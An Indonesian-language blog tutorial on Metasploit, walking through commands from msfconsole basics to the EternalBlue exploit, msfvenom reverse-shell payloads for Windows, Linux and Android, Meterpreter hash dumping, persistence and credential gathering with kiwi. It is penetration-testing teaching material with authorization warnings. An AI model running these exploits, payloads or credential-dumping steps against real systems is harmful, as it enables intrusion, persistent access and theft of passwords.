Cybersecurity

Panduan Lengkap Metasploit: Basic hingga Intermediate Command untuk Penetration Testing

9 Mei 2026 Seraphim News 5 mnt baca
🔵 PENETRATION TESTING GUIDE

Metasploit Framework merupakan salah satu tools penetration testing paling populer di dunia keamanan siber. Framework ini digunakan oleh penetration tester, red team, dan peneliti keamanan untuk melakukan eksploitasi, validasi kerentanan, hingga simulasi serangan terhadap sistem target.

Artikel ini membahas command dasar hingga intermediate yang umum digunakan dalam workflow penetration testing menggunakan Metasploit Framework.

Gunakan hanya pada sistem yang memiliki izin resmi untuk diuji.


Menjalankan Metasploit Framework

Buka terminal:

msfconsole

Tunggu hingga Metasploit selesai melakukan proses loading module.


Basic Command Metasploit

Melihat Bantuan

help

atau:

?

Menampilkan Informasi Workspace

workspace

Membuat workspace baru:

workspace -a pentestlab

Berpindah workspace:

workspace pentestlab

Melihat Module

show exploits
show payloads
show auxiliary
show post
show encoders

Mencari Exploit

search smb

Contoh:

search eternalblue

Menggunakan Module

use exploit/windows/smb/ms17_010_eternalblue

Melihat Opsi Module

show options

Mengatur Parameter

set RHOSTS 192.168.1.10
set LHOST 192.168.1.5
set PAYLOAD windows/x64/meterpreter/reverse_tcp

Menjalankan Exploit

run

atau:

exploit

Auxiliary Scanner

Scan Port

use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
run

SMB Version Scanner

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.10
run

FTP Anonymous Login Check

use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.1.20
run

Payload dan Meterpreter

Melihat Session Aktif

sessions

Interact ke Session

sessions -i 1

Command Meterpreter Dasar

Melihat informasi sistem:

sysinfo

Melihat user:

getuid

Membuka shell:

shell

Melihat proses:

ps

Migrasi proses:

migrate PID

Dump hash password:

hashdump

Screenshot desktop:

screenshot

Upload file:

upload file.txt

Download file:

download secret.txt

Background session:

background

Intermediate Command

Database Command

Inisialisasi database:

db_status

Import hasil Nmap:

db_import scan.xml

Melihat host tersimpan:

hosts

Melihat service:

services

Integrasi dengan Nmap

Menjalankan Nmap dari Metasploit:

db_nmap -sV 192.168.1.10

Exploit Multi Handler

Digunakan untuk menerima reverse shell.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444
run

Membuat Payload dengan msfvenom

Payload Windows EXE

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exe

Payload Linux ELF

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f elf > shell.elf

Payload Android APK

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > payload.apk

Post Exploitation

Enumerasi Network

ipconfig
route

Persistence

run persistence -U -i 5 -p 4444 -r 192.168.1.5

Credential Gathering

load kiwi
creds_all

Tips Penggunaan Aman

  • Gunakan hanya pada environment legal
  • Jangan menjalankan exploit sembarangan ke internet publik
  • Gunakan lab virtual untuk belajar
  • Selalu dokumentasikan aktivitas penetration testing
  • Perbarui Metasploit secara rutin

Kesimpulan

Metasploit Framework tetap menjadi salah satu tools paling powerful dalam dunia penetration testing modern. Memahami command dasar hingga intermediate akan membantu penetration tester melakukan asesmen keamanan secara lebih efektif dan terstruktur.

Dengan kombinasi scanning, exploitation, payload management, dan post-exploitation, Metasploit menjadi platform penting dalam workflow offensive security dan red teaming modern.

Powered by Seraphim Engine